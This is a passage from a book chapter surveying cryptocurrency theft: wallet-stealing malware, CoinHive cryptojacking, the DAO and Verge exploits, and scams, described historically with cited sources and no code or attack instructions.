The first chapter of this book laid out the technical basis of cryptocurrencies dividing them into two major types: those based on public blockchains and those based on private blockchains. Private blockchains have one or multiple authorities that act as blockchain administrators, which allows one to increase the transaction efficiency by removing the necessity to looking for hashes, engage in monetary policy by expanding or contracting the monetary supply as necessary, revert or nullify transactions and everything else that is done in traditional payment or monetary systems. Although the technology power- ing them differs slightly from distributed databases with cryptographic signatures, the functionality offered has existed since the mid–1990s and has only now been garnished in public prestige as Bitcoin made news. Conversely, Bitcoin itself and other public blockchains do not exhibit any of the above characteristics or exhibit them in a suffi- ciently difficult to attain form: transactions on the main chain are inefficient and require solutions that build on atop it, the money supply is pre-programmed and transactions cannot be reversed under normal circumstances. These characteristics offer certain ad- vantages and allow for the creation of marketplaces like Silk Road and ransomware, which would be more difficult to utilize over a payment system where the supervising authorities can be subpoenaed or raided.
While the ideological core demographic of cryptocurrencies very much welcomes a number of the outcomes of this irreversibly, the effects of the said activities are not experienced directly by those in support of the technology. Most people do not get their wedding photos encrypted and held hostage by Russian malware, fewer still suffer primary or secondary effects of drug addiction and, when all is said and done, the entire range of effects of monetary policy and bank bailouts are understood by such a minuscule portion of the population that one may as well have any opinion under the sun and never have it affect one’s life in a perceptible way. These effects of the operation of the Bitcoin network constitute economic externalities that users of the network itself do not pay the price of but distribute it sporadically among the population as a whole. This is particularly so the case with regard to the emissions generated by the mining process. Furthermore, these are either problems of another or issues macroeconomic enough to be handled only
on representatives’ level, thus making the individual’s opinion largely irrelevant. What is relevant to bitcoin holders is having them stolen and there being no recourse to get them back.
There are several mechanisms through which this can occur. The first is by stealing the coins directly from the wallet of their respective owner akin to breaking into one’s home and taking anything of value. The second group collects coins by forcing unaware computer owners, who may not even know what bitcoins are, to mine them for the criminal. There is a third much less common group of cryptocurrency thieves that tap into the weaknesses of individual blockchains themselves and seep the coins out of the others’ wallets or mint their own coins by exploiting the very system itself. The fourth one achieved is by having the individual willingly surrender their coins in expectation of greater returns, safekeeping or some other tangible benefit. A fifth group would consist of those criminals breaking into an institution keeping coins of multiple other owners and stealing them. Whilst all of the above criminals obtain cryptocurrencies from their rightful owners in different ways, the skill sets of most of the above individuals are largely identical and would fall under the umbrella of what is popularly known as hackers. In practice, this means knowledge of certain areas of programming and the ability to identify exploitable vulnerabilities in software systems. Depending on the technique, a smaller or larger degree of social engineering may be required.72
Crypto-burglars and crypto-slavers
Methods one and two in the above list typically consist of infecting the target’s computer with malware. This malware can be distributed through any of the usual means, be it through emails or websites asking the user to execute a computer program that alleges to do something that the user wants. Once the program is executed by the user it begins working for its author.
The first of these appeared already in June 2011 and targeted Windows computers.73
At this point, the selection of Bitcoin wallets was still mostly limited to the original Bitcoin Core wallet, which made it a particularly good target for attacks. Once the program was executed all it had to do was look for the wallet file, which was always stored in the same location within the user’s personal directory. If the infected machine did not have the Bitcoin wallet installed on it, the malware would not do anything. If it did, the program attempted to email the wallet file to the attackers’ email address and pretend not to exist. Ideally, the target should remain none the wiser about what had
72. Terms invented by the author and styled in the general spirit of cryptocurrency lingo.
73. Symatec, Infostealer.Coinbit, Web Page, 2011, accessed 15 June 2019, https://www.symantec.co m/security-center/writeup/2011-061615-3651-99?tabid=2.
occurred until the attacker retrieves the freshly emailed in private keys for the target and transfers the entirety of the balance to their own account. The first time the target would become aware of the attack would be upon opening their wallet and seeing a transaction they did not execute. Unlike with banks and other centralized payment systems though, there would be no phone number to call for help.
Several solutions to better protect one’s wallet have evolved as a result. The most basic one of these was encrypting the wallet with a password, which nonetheless could be intercepted by malware upon entry making the system less than ideally protected. A better solution was offered by keeping the wallet application on one’s Apple iPhone, which unlike the desktop operating systems segregates data of one application from another and thus makes it much more difficult to access the private keys. Security limitations furthermore made keyboard recording neigh impossible. The most advanced form of protection came with the so-called hardware wallets. These are specialized hardware devices that store the private keys and require the user to press physical buttons on the device to perform a transaction.
The second type of attack is more egalitarian and affects both individuals who own cryptocurrency and those who do not. The malware does not attempt to retrieve the private keys but rather turns the infected system into a cryptocurrency miner. This does not lead to a large loss of funds if detected and addressed early, but nonetheless adversely affects the computer’s performance by using up the available resources to mine cryptocurrencies. Running performance-intensive applications like video games and high definition video becomes unsustainable and even low-intensity programs such as web browsers and office suites begin to run considerably slower. The higher cycles of the central processing unit or the graphics processor also result in higher power consumption and thus electricity costs of operating the computer.
CoinHive as the most notable example of this quasi-malware had commendable roots and followed the road laid out with good intentions. Although the service has since ceased operations, it aimed to solve a number of persistent issues faced by operators of websites: monetization and spam.74
The former is a problem that the online publications have struggled with since the popularization of the Internet. On the one hand, one needs a source of revenue for the effort put into creating the web content and to cover the costs of operating the site. On the other hand, only a handful of well-established names can effectively demand a subscription fee for their online publications. While advertising is a solution, it distracts from the contents and is not liked by the readers. Since the popularization of browser
74. CoinHive, A Crypto Miner for Your Website, Web Page, 2017, accessed 15 June 2019, https://w eb.archive.org/web/20190327011711/https://coinhive.com/.
add-ons in the Firefox browser during the early 2000s, blocking advertisements has also become an option that left the hosts with no revenue to speak of. CoinHive offered a way out by forcing the browser to mine the cryptocurrency Monero while the reader had the website open.
At first, this may appear as a very fair way to pay for visiting the websites as the more time the user spends on the website the more revenue they generate, providing an incentive for the content authors to create appealing pages that users would visit often. The devil in the detail had been that the in-browser miner was highly inefficient and generated not only a fraction of the revenue of a non-intrusive advertisement, but also considerably less than the visitor paid in electricity costs to generate the hashes.75 The
rapidly accelerating cooling fans of the readers’ computer also undoubtedly made for less than ideal reading experience.
The issue took on new proportions once enterprising individuals understood that one does not have to follow CoinHive authors’ advice and can embed the mining code not only without informing the user but also without informing the operator of the website. Popular web pages such as Politifact and the American television provider CBS’s Showtime were hacked and had CoinHive code inserted into them to mine Monero for the hacker.76 An even better vector of attack became apparent once the hackers figured out
that CoinHive’s code can be inserted into nothing other than online advertisements that CoinHive was designed to replace. Popular websites such as YouTube had now served ads that took over the CPU cycles and mined Monero while the target watched the videos.77
Eventually, CoinHive became the target of the same parties as online advertisement. AdBlocker and antivirus providers began adding new rules to their databases to prevent any of the CoinHive’s code from executing. CoinHive ceased operations in March 2019, citing that it could no longer effectively operate following a new fork of the Monero blockchain.78 Its anti-spam Captcha filter variant, which required the user to solve a
number of hashes before being able to post online died along with it as an unfortunate victim of the advertisement competitor’s success.
75. Maxence Cornet, Coinhive Review: Embeddable JavaScript Crypto Miner - 3 Days In, Web Page, 2017, accessed 15 June 2019, https://medium.com/%5C@MaxenceCornet/coinhive-review-embeddab le-javascript-crypto-miner-806f7024cde8.
76. Iain Thomson, Stealth Web Crypto-Cash Miner Coinhive Back to the Drawing Board as Blockers
Move In, Web Page, 2017, accessed 15 June 2019, https://www.theregister.co.uk/2017/10/19/mal
warebytes_blocking_coin_hive_browser_cryptocurrency_miner_after_user_revolt/.
77. Dan Goodin, Now Even YouTube Serves Ads With CPU-draining Cryptocurrency Miners, Web Page, 2018, accessed 15 June 2019, https://arstechnica.com/information-technology/2018/01/n ow-even-youtube-serves-ads-with-cpu-draining-cryptocurrency-miners/.
78. Catalin Cimpanu, Coinhive Cryptojacking Service to Shut Down in March 2019, Web Page, 2019, accessed 15 June 2019, https://www.zdnet.com/article/coinhive-cryptojacking-service-to-sh ut-down-in-march-2019/.
Crypto-leeches
The third type of attack is perhaps the least interesting of all, but nonetheless a fun- damental element of cryptocurrencies that cannot be ignored. Many cryptocurrency enthusiasts are quick to point out that they put more trust in mathematics than they do in the fallible individuals working in the banking sector. Another popular expression used to express the same idea is a phrase “code is law” coined by the academic and activist Lawrence Lessig, albeit it appears that the nuance of Lessing’s argument has been lost in the popular understanding of the phrase.79 This naturally, as the said enthusiasts will
point out equally quickly, results in subtracting the undesirable human elements from money, be it corruption, error or the agent-principal problem. A computer program does merely what it has been written to do, like a perfect servant without questioning its authors’ commands or pursuing its own agenda.
While this has certain advantages, it also comes with a major drawback. Writing computer code that does precisely what the author intended it to do is difficult. The more complex the code program becomes, the more likely it is that the human author himself had committed a human error and unintentionally given birth to a bug. Students of the classics will remember how the Greek king Midas asked the deity Dionysus to give him a magical touch that would turn everything to gold, only to find out that he could no longer enjoy a hearty meal or even sustain himself as even the food and drink he touched would turn to cold, unpalatable metal. Fortunately, when it comes to software development one can usually wish for more wishes and rectify the problem to no longer produce the unintended effects.
Bitcoin prides itself in that the blockchain itself had never been hacked. Nobody has yet found a way to simply add more bitcoins to their wallet out of thin air or delete others’ bitcoins through some unforeseen error in the system’s code. The same cannot be said about certain other projects.
One of the most famous examples of this, largely by the virtue of occurring early, had occurred in the previously mentioned Ethereum. The blockchain differentiated itself from Bitcoin and other cryptocurrency projects of the time by not being merely a distributed ledger for moving coins between wallets, but by offering additional distributed computing functionality on top of the blockchain. The participants cannot use the computers of other participants for computationally intensive tasks and reward them with cryptocurrencies, which has been proposed by some other projects, but rather the mining process itself can include very inefficient computing performed across the entire network. While this may at first appear of questionable benefit, this sort of process can be used for executing what
79. Lawrence Lessig, Code Is Law: On Liberty in Cyberspace, Web Page, 2000, https://harvardmaga zine.com/2000/01/code-is-law-html.
Ethereum calls “smart contracts”. These are in practice just computer programs that do something when specific conditions are met and cannot be interfered with.
Early in Ethereum’s life, one such contract known as the Decentralized Autonomous Organization (DAO) had been launched to create a kind of Ethereum fund. Assets would be added to it and the shareholders of the fund could decide what the fund would invest in by voting through its smart contract. As very quickly became apparent, the DAO had a bug in it which allowed the attackers to seep the currency “ether” out of the fund over and over again. The attacker who exploited it managed to withdraw $60 million from the investors. The transactions could not be reverted and there was no routine way to return the funds to their proprietors. What happened is that the magnitude of the theft and its potential to drag the entire project down with it led a sufficient number of ether miners to decide to revert the blockchain to the state prior to the exploit. This effectively nullified all the transactions taking place following the hack, including not only the apparently illicit withdrawal itself but also everything else. If one had used Ethereum to buy stolen credit card numbers on some successor to Silk Road, those purchases had suddenly become gratis. Any ether bought following the hack on an exchange against payment in bitcoin or another unaffected cryptocurrency was also no longer part of the Ethereum blockchain. This defiance of the “code is law” mantra had nonetheless irked a number of more devout Ethereum miners, who concluded that they will continue to operate on the blockchain where the hack had occurred. It became a second Ethereum blockchain known as Ethereum Classic. The two blockchains are identical until the point of reversal and diverge shortly before the hack. The previous holders of ether now owned the same quantity two coins, ether (ETH) and ethereum classic (ETC).80
Although this is probably the most notable example of the code itself being hacked, the subject of the hack was a smart contract rather than the Ethereum blockchain itself. This is not to say that there had not been some attacks on the underlying blockchains themselves. In 2018, one such blockchain had been Verge, wherein the hacker succeeded in decreasing the difficulty of mining the cryptocurrency by approximately 6 billion times for some miners, but not for others, thus generating approximately $80 per second worth of coins for their own wallet.81 Some other blockchains had been exploited in similar
ways.82Even the thus far flawless Bitcoin blockchain was in danger of creating additional
80. David Siegel, Understanding the DAO Attack, Web Page, 2016, accessed 25 June 2019, https://w ww.coindesk.com/understanding-dao-hack-journalists.
81. Daniel Goldman, The Verge Hack, Explained: Time Warps, Mining Exploits, Denial of Service, and
More!, Web Page, 2018, accessed 25 June 2019, https://blog.theabacus.io/the-verge-hack-expla
ined-7942f63a3017.
82. Mike Orcutt, Once Hailed as Unhackable, Blockchains Are Now Getting Hacked, Web Page, 2019, accessed 25 June 2019, https://www.technologyreview.com/s/612974/once-hailed-as-unhackabl e-blockchains-are-now-getting-hacked/.
bitcoins when a bug in its reference implementation had been discovered. In this case, the bug was found by the developers themselves and patched before it could be exploited.83
To summarize, in the case of cryptocurrencies code does indeed appear to be law and human error within the fabric of the blockchain itself can lead to exploits through a third party. When push comes to shove and a sufficient number of otherwise ardent “code is law” proponents have their investments expropriated from them through the said law, the attitudes appear to change rather rapidly. In most cases, the systems’ greatest strength also appears to be its major weakness. The vast sums locked in the cryptocurrencies also make them perfect targets for such hacking attempts. Whereas compromising a corporate web server only may be profitable, exploiting a blockchain is almost certainly guaranteed to be so. Even in the case of Ethereum, where transactions have been reverted, the continued existence of Ethereum Classic had more than compensated the exploiter.
Crypto-scammers
Method four is in principle not unique to cryptocurrencies and falls into the general category of Internet scams, phishing—an attempt to present the fraudsters’ page as that of a legitimate organization—or Ponzi schemes. As with ransomware and narcotics, all of these activities were possible and prevalent before and were merely accelerated to the new level with the addition of Bitcoin and its younger siblings that allowed comparably quick and irreversible transactions.
While crypto-burglars wrote software that would steal the private keys, a group of